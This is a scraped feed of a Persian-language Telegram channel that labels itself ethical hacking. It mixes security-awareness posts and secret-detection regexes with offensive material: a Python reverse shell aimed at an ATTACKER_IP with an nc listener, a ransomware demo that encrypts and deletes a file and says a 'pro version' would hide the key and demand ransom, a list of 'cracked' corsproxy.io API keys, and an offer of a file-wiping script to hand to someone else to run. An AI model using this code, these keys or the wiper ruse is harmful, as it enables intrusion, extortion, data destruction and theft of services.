DarkPacket
7K subscribers
28 photos
2 videos
50 files
60 links
> 🛡️ Ethical Hacking | Cyber Security

💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
قرار ممبر خارجی از روسیه و اطراف هم بیاد
از این به بعد پست انگلیسی هم میزاریم

We're planning to have foreign members from Russia and the surrounding areas join us. From now on, we'll also be posting in English.
10
آموزش ساخت پروکسی با کلاودفلار:

مراحل ساخت از ۰ تا ۱۰۰ (کمتر از ۳ دقیقه)

اول به داشبورد کلاودفلار بروید

لینک مستقیم داشبورد:
dash.cloudflare.com

مرحله ۲: ساخت Worker جدید
از منوی سمت چپ، روی گزینه Workers & Pages کلیک کنید
روی دکمه آبی رنگ Create Application کلیک کنید و گزینه Create Worker را انتخاب کنید و یک نام برای آن بگذارید (مثلاً: god-cors-proxy) و روی Deploy کلیک کنید.

مرحله ۳: کدی که تو پیام زیر میدم کامل کپی کنید و تو فایل Worker.js که هست وارد کنید یعنی هرچی کد تو این فایل دیفالت هست پاک کنید و کدی که تو پیام بعد میدم بزنید.

مرحله ۴: ذخیره و دیپلوی
روی دکمه Save and Deploy (بالا سمت راست) کلیک کنید.

تبریک می‌گویم! پروکسی شما آماده است. آدرس آن چیزی شبیه به این خواهد بود:
https://god-cors-proxy.YourUserName.workers.dev

🧪 نحوه استفاده و تست:
فرض کنید آدرس ورکر شما این است
:https://god-cors-proxy.yourname.workers.dev
پس لینک پروکسی CORS میشه:
https://god-cors-proxy.yourname.workers.dev/?url=https://t.me

#CORS #آموزشی #ℳℴ𝒷𝒾𝓃
3🔥1
DarkPacket
آموزش ساخت پروکسی با کلاودفلار: مراحل ساخت از ۰ تا ۱۰۰ (کمتر از ۳ دقیقه) اول به داشبورد کلاودفلار بروید لینک مستقیم داشبورد: dash.cloudflare.com مرحله ۲: ساخت Worker جدید از منوی سمت چپ، روی گزینه Workers & Pages کلیک کنید روی دکمه آبی رنگ Create Application…
Code:
export default {
async fetch(request, env, ctx) {
// دریافت URL هدف از پارامتر query
const urlParam = new URL(request.url).searchParams.get('url');

if (!urlParam) {
return new Response('Usage: ?url=https://example.com/api/data', {
status: 400,
headers: { 'Content-Type': 'text/plain' }
});
}

let targetUrl;
try {
targetUrl = new URL(urlParam);
} catch (e) {
return new Response('Invalid URL provided', { status: 400 });
}

// کپی هدرهای درخواست برای ویرایش (حالت ضد شناسایی)
const headers = new Headers(request.headers);

// حذف هدرهای شناسایی‌کننده که باعث مسدود شدن توسط WAF یا CORS می‌شوند
headers.delete('origin');
headers.delete('referer');
headers.delete('cookie'); // جلوگیری از نشت کوکی‌های کاربر نهایی (امنیت بالاتر)

// تنظیم یک User-Agent استاندارد و تمیز در صورت عدم وجود
if (!headers.has('user-agent')) {
headers.set('user-agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36');
}

// ارسال درخواست به سرور مقصد
const response = await fetch(targetUrl, {
method: request.method,
headers: headers,
body: request.method !== 'GET' && request.method !== 'HEAD' ? request.body : undefined,
redirect: 'follow' // دنبال کردن ریدایرکت‌ها به صورت خودکار
});

// ساخت هدرهای پاسخ برای فعال‌سازی کامل CORS
const corsHeaders = new Headers(response.headers);
corsHeaders.set('Access-Control-Allow-Origin', '*');
corsHeaders.set('Access-Control-Allow-Methods', 'GET, HEAD, POST, PUT, DELETE, PATCH, OPTIONS');
corsHeaders.set('Access-Control-Allow-Headers', '*');
corsHeaders.set('Access-Control-Max-Age', '86400');

// حذف هدرهایی که ممکن است وجود پروکسی را لو بدهند یا باعث تداخل شوند
corsHeaders.delete('content-security-policy');
corsHeaders.delete('x-frame-options');

// مدیریت درخواست‌های Preflight (OPTIONS) به صورت آنی و بدون بار اضافی
if (request.method === 'OPTIONS') {
return new Response(null, {
status: 204,
headers: corsHeaders
});
}

// بازگرداندن پاسخ نهایی به کلاینت
return new Response(response.body, {
status: response.status,
statusText: response.statusText,
headers: corsHeaders
});
}
};
7🔥1
🕶️ Cyber Fact | یک USB ناشناس...

گاهی یک فلش ناشناس روی میز یا پارکینگ، تصادفی رها نشده؛ ممکنه بخشی از یک USB Drop Attack باشه.

🎯 مهاجم روی کنجکاوی قربانی حساب می‌کنه تا دستگاه رو به سیستم وصل کنه.

⚠️ چیزی که رایگان پیدا می‌کنی، لزوماً بی‌خطر نیست.

---

🕶️ Cyber Fact | An Unknown USB...

Sometimes, an unknown USB left in a public place isn’t there by accident; it could be part of a USB Drop Attack.

🎯 Attackers may rely on curiosity to convince someone to plug the device into their computer.

⚠️ Something you find for free isn’t necessarily safe.

#CyberSecurity #USB #RedTeam #SecurityAwareness #Tyger
4🔥4👍1
هم وطن های عزیزم
کامنت و ری اکشن هارو بترکونین عصر چند تا فایل اپلود میکنم حال کنین
19🔥125👍2
🔴 Hacker Fact | حتی MFA هم همیشه کافی نیست...

در حمله‌ی MFA Fatigue، مهاجم با ارسال درخواست‌های متعدد ورود، کاربر را تحت فشار قرار می‌دهد تا در نهایت یکی از درخواست‌ها را تأیید کند. 👀

🎯 این حمله به‌جای شکستن MFA، روی خستگی و بی‌دقتی کاربر حساب می‌کند.

⚠️ اگر درخواست MFA را خودت شروع نکردی، تأییدش نکن.


🔴 Hacker Fact | Even MFA Isn’t Always Enough...

In an MFA Fatigue attack, an attacker sends repeated login requests, hoping the user will eventually approve one of them. 👀

🎯 Instead of breaking MFA, the attack relies on user fatigue and inattention.

⚠️ If you didn’t initiate the login, don’t approve the MFA request.

#CyberSecurity #MFA #RedTeam #SecurityAwareness
#Tyger
2
از الان میگم خدارو شکر وضعیت اومدن ممبر به کانالم خوبه روزانه 200.300تا میاد از رو تبلیغات
از همین الان قول میدم که دیدین دفعه قبل گفتم 6کا بشیم قره کشی راه میندازم
الانم میگم اگه 20کا بشیم بلاخره هزینه بردار
20تا یا قره کشی 3ماهه پریمیوم انجام میدم
یا 10تا 6ماهه

اگه از این به بعد قول بدین
تو حمایت بترکونین شاید زودتر هم انجام بدم
کافیه بهم انگیزه بیاد من جبران میکنم 🔪
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥2
newfile.py
6.2 KB
اینم یک اسکریپت شخصی سازی شده
برای حذف فایل های شخصی
فقط کافیه بدین طرف ران کنه توی اندروید با ترموکس یا پایدروید توی ویندوز با وی اس کد یا توی لینکوس با ترمینال
البته طرف کد نویس باشه متوجه میشه
این صرفا بخاطر کسایی هست که آتویی دست یکی داره و میخواد پاک بشه
پس استفاده درست کنین ازش
در ضمن به هیچ عنوان خودتون ران نکنین تو کسری از ثانیه همه اطلاعات دلت میشه
4
لیست ۲۵ الگوی Regex برای شناسایی اطلاعات حساس (Data Leakage)

\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}\b (Email)
\b(?:\d[ -]*?){13,16}\b (Credit Card)
\b\d{3}-\d{2}-\d{4}\b (SSN)
\bAKIA[0-9A-Z]{16}\b (AWS Access Key)
\bASIA[0-9A-Z]{16}\b (AWS Temp Key)
AIza[0-9A-Za-z_-]{35} (Google API Key)
sk_live_[0-9a-zA-Z]{24,} (Stripe Secret Key)
ghp_[0-9a-zA-Z]{36} (GitHub Token)
xox[baprs]-[0-9a-zA-Z-]{10,} (Slack Token)
-----BEGIN RSA PRIVATE KEY----- (Private Key)
-----BEGIN OPENSSH PRIVATE KEY----- (SSH Key)
password\s*[:=]\s*\S+ (Password)
secret\s*[:=]\s*\S+ (Secret)
api[_-]?key\s*[:=]\s*\S+ (API Key)
token\s*[:=]\s*\S+ (Token)
Authorization\s*:\s*Bearer\s+\S+ (Bearer Token)
mongodb(\+srv)?://[^\s]+ (MongoDB URL)
postgres://[^\s]+ (PostgreSQL URL)
mysql://[^\s]+ (MySQL URL)
redis://[^\s]+ (Redis URL)
amqp://[^\s]+ (RabbitMQ URL)
ftp://[^\s]+ (FTP URL)
smtp://[^\s]+ (SMTP URL)
BEGIN PGP PRIVATE KEY (PGP Key)
\d{11} (Iran National ID)

#Regex #آموزشی #ℳℴ𝒷𝒾𝓃
🔥32
لیست ۱۰ ابزار ضروری برای تست امنیت (همه رایگان)

Nmap – اسکن شبکه و پورت
Burp Suite Community – تست برنامه تحت وب
Wireshark – تحلیل ترافیک شبکه
Nikto – اسکنر آسیب‌پذیری وب
SQLmap – تست تزریق SQL
Hydra – تست brute-force رمز عبور
Metasploit Framework – تست نفوذ کامل
Gobuster – پیدا کردن مسیرهای مخفی
John the Ripper – کرک پسورد
Aircrack-ng – تست امنیت وای‌فای

#tools #آموزشی #ℳℴ𝒷𝒾𝓃
🔥41
لیست ۱۵ هدر امنیتی که هر وبسایت باید داشته باشد

اگر سایت دارید، این هدرها را روی سرور خود تنظیم کنید تا امنیت بالاتری داشته باشید.

X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src 'self'
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=()
X-XSS-Protection: 1; mode=block
Cache-Control: no-store
Pragma: no-cache
Access-Control-Allow-Origin: https://example.com
Feature-Policy: camera 'none'
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Set-Cookie: Secure; HttpOnly; SameSite=Strict

#آموزشی #ℳℴ𝒷𝒾𝓃
4🔥1
لیست ۲۰ هدر رایج که اطلاعات سرور را لو می‌دهند

Server: Apache/2.4.41
Server: nginx/1.18.0
Server: Microsoft-IIS/10.0
Server: LiteSpeed
X-Powered-By: PHP/7.4.33
X-Powered-By: ASP.NET
X-Powered-By: Express
X-AspNet-Version: 4.0.30319
X-Runtime: 0.123456
X-Drupal-Cache: HIT
X-Generator: WordPress 6.4.1
X-Varnish: 123456
Via: 1.1 varnish
X-Cache: HIT
X-Amz-Cf-Id: abc123
X-Backend-Server: web01
X-Request-ID: 1234567890
X-Debug-Token: abcdef123456
X-Trace-Id: 1234567890
X-Transaction-ID: abcdef123456


#آموزشی #ℳℴ𝒷𝒾𝓃
4🔥1
لیست ۱۵ خطای رایج که اطلاعات حساس لو می‌دهند

Warning: mysqli_fetch_array() expects parameter...
Fatal error: Uncaught Exception...
Notice: Undefined index: user in...
Parse error: syntax error, unexpected...
PDOException: SQLSTATE[42000]...
Stack trace: #0 /var/www/html...
ORA-00933: SQL command not properly ended
Microsoft OLE DB Provider for ODBC Drivers
TypeError: Cannot read property...
NullPointerException at com.example...
Debugging info: SELECT * FROM users...
Traceback (most recent call last)...
Warning: pg_connect(): Unable to connect...
MySQL server version for the right syntax...
Path: /home/user/public_html/...


#آموزشی #ℳℴ𝒷𝒾𝓃
4🔥1
۵۰ عدد User-Agent:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.52
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.128
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.52
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/107.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Linux; Android 14; SM-S921B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 13; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 14; SM-T970) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0


#User-Agent #آموزشی #ℳℴ𝒷𝒾𝓃
🔥41👍1
تعدادی پروکسی کرک شده فعال از سایت corsproxy.io:

https://corsproxy.io/?key=3ea6efce&url=http://example.com
https://corsproxy.io/?key=14140035&url=http://example.com
https://corsproxy.io/?key=1101a4e3&url=http://example.com
https://corsproxy.io/?key=7fe10987&url=http://example.com
https://corsproxy.io/?key=fa1a827f&url=http://example.com
https://corsproxy.io/?key=798be704&url=http://example.com
https://corsproxy.io/?key=5f0076e6&url=http://example.com
https://corsproxy.io/?key=bdf29fc5&url=http://example.com
https://corsproxy.io/?key=5f7d15ff&url=http://example.com
https://corsproxy.io/?key=839cf7da&url=http://example.com
https://corsproxy.io/?key=b9aac4bc&url=http://example.com
https://corsproxy.io/?key=856c89ff&url=http://example.com
https://corsproxy.io/?key=054af249&url=http://example.com
https://corsproxy.io/?key=02a83d86&url=http://example.com
https://corsproxy.io/?key=b5b98ce9&url=http://example.com
https://corsproxy.io/?key=f5bebaf5&url=http://example.com
https://corsproxy.io/?key=08677b5d&url=http://example.com
https://corsproxy.io/?key=9c95e1f7&url=http://example.com
https://corsproxy.io/?key=4b9f21b0&url=http://example.com
https://corsproxy.io/?key=d3b9501d&url=http://example.com
https://corsproxy.io/?key=2a6e1787&url=http://example.com
https://corsproxy.io/?key=86f67453&url=http://example.com
https://corsproxy.io/?key=eee8f095&url=http://example.com
https://corsproxy.io/?key=a435fa40&url=http://example.com
https://corsproxy.io/?key=4a61f73f&url=http://example.com
https://corsproxy.io/?key=b5a8fa6e&url=http://example.com
https://corsproxy.io/?key=e9871471&url=http://example.com
https://corsproxy.io/?key=4f2b3b5d&url=http://example.com
https://corsproxy.io/?key=345b7a9a&url=http://example.com
https://corsproxy.io/?key=4dbb19c1&url=http://example.com


#Cors_Proxy #آموزشی #ℳℴ𝒷𝒾𝓃
31🔥1
🌑 Hacker Fact | وقتی سایت مورد اعتماد تبدیل به تله میشه...

در حمله‌ی Watering Hole، مهاجم یک وب‌سایت مورد اعتمادِ گروه هدف را آلوده یا دستکاری می‌کند تا بازدیدکنندگان آن را هدف قرار دهد. 👁️

🎯 قربانی ممکن است بدون کلیک روی یک لینک مشکوک، صرفاً با بازدید از یک سایت آشنا در معرض حمله قرار بگیرد.

⚠️ حتی سایت‌های آشنا هم همیشه به معنی سایت‌های امن نیستند.

---

🌑 Hacker Fact | When a Trusted Website Becomes a Trap...

In a Watering Hole Attack, an attacker compromises or manipulates a website trusted by the target group to target its visitors. 👁️

🎯 A victim may be exposed simply by visiting a familiar website, without clicking a suspicious link.

⚠️ A familiar website isn’t always a safe website.

#CyberSecurity #WateringHole #Hacking #RedTeam #Tyger
5
ی گیفتی چیزی بزنین خوشحالم کنین 😄
@net_activenull
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥63👍1
🎯 Victim Fact | قربانی همیشه متوجه نمی‌شود...

گاهی قربانی یک حمله ممکنه هفته‌ها یا حتی ماه‌ها از حضور مهاجم در سیستمش خبر نداشته باشه. 👁️

مهاجم می‌تونه مدتی بدون ایجاد رفتار کاملاً واضح، اطلاعات جمع‌آوری کنه یا دسترسی خودش رو حفظ کنه.

⚠️ خطرناک‌ترین حمله، همیشه حمله‌ای نیست که سریع دیده بشه.

پ.ن: یاد فیلم Mr. Robot افتادم :)

---

🎯 Victim Fact | The Victim Doesn’t Always Notice...

Sometimes, a victim may remain unaware of an attacker’s presence for weeks or even months. 👁️

An attacker may stay under the radar while gathering information or maintaining access.

⚠️ The most dangerous attack isn’t always the one you notice immediately.

P.S.: This reminded me of Mr. Robot :)
#CyberSecurity #Victim #Hacking #RedTeam #Tyger
4
شل معکوس (Reverse Shell)

# reverse_shell_demo.py
# این کد یک اتصال معکوس به سیستم مهاجم برقرار می‌کند
# فقط در محیط آزمایشی با اجازه صاحب سیستم

import socket
import subprocess
import os

# آدرس و پورت سیستم مهاجم (برای تست، از localhost استفاده کنید)
ATTACKER_IP = "127.0.0.1"
ATTACKER_PORT = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, ATTACKER_PORT))

# ارسال پوسته به مهاجم
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

subprocess.call(["/bin/sh", "-i"])

چطوری باید استفاده بکنید
خوب شما به عنوان هاکر در سیستم مهاجم ابتدا
nc -lvnp 4444
اجرا کنید، بعد این کد را در سیستم قربانی اجرا کنید.
این برای آموزش هست رو گوشی فامیل ها تست نکنید. 😂

#Shell #آموزشی #ℳℴ𝒷𝒾𝓃
3
باج‌افزار نمایشی (Ransomware Demo)

# ransomware_demo.py
# این کد فقط یک فایل نمونه را در یک پوشه موقت رمزنگاری می‌کند
# برای درک مفهوم رمزنگاری، نه برای استفاده واقعی

import os
from cryptography.fernet import Fernet

# فقط یک فایل تستی در /tmp
test_file = "/tmp/testfile.txt"

# ساخت فایل نمونه
with open(test_file, "w") as f:
f.write("این یک فایل تست است")

# تولید کلید
key = Fernet.generate_key()
cipher = Fernet(key)

# رمزنگاری فایل
with open(test_file, "rb") as f:
data = f.read()
encrypted = cipher.encrypt(data)

with open(test_file + ".encrypted", "wb") as f:
f.write(encrypted)

# حذف فایل اصلی (در محیط واقعی ممکن است حذف شود)
os.remove(test_file)

print(f"فایل رمزنگاری شد. کلید: {key.decode()}")

برای استفاده
به cryptography نیاز داری
pip install cryptography
این کد فقط یک فایل در /tmp را رمزنگاری میکنه و بعد کلید رو نشون می‌ده
تو نسخه حرفه‌ای باید کلید را مخفی بکنید و درخواست رو هم باج بکنید. این بیشتر نمونه بود.

#Ransomware #آموزشی #ℳℴ𝒷𝒾𝓃
3